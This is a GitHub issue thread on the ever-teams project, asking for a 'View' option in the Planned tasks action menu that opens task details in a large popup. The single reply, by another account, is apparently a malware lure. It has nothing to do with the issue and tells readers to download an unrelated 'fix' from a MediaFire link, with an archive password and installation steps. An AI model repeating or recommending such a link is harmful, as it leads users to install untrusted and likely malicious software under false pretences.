### ISSUE TITLE
[Task] 'Planned' | add 'View' to Action ( ... ) menu

### ISSUE THREAD

**Issue by KostyaEver** [ever-co/ever-teams#2962]
User should be able to see task description from the popup 'Planned tasks' by clicking 'View' in the Action ... menu

**Expect**: clicking 'View' it should open task details page in the format of **a big popup**.

The reason is that the user should be able to quickly see what is the task about, by seeing the description

<img width="503" alt="Screenshot at Aug 27 09-32-52" src="https://github.com/user-attachments/assets/eaca1e04-64c8-4010-8a58-cc5e720d166d">

<img width="500" alt="Screenshot at Aug 27 09-33-51" src="https://github.com/user-attachments/assets/fbb721cb-6d7b-42b4-b8a3-942cccf50ff5">

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
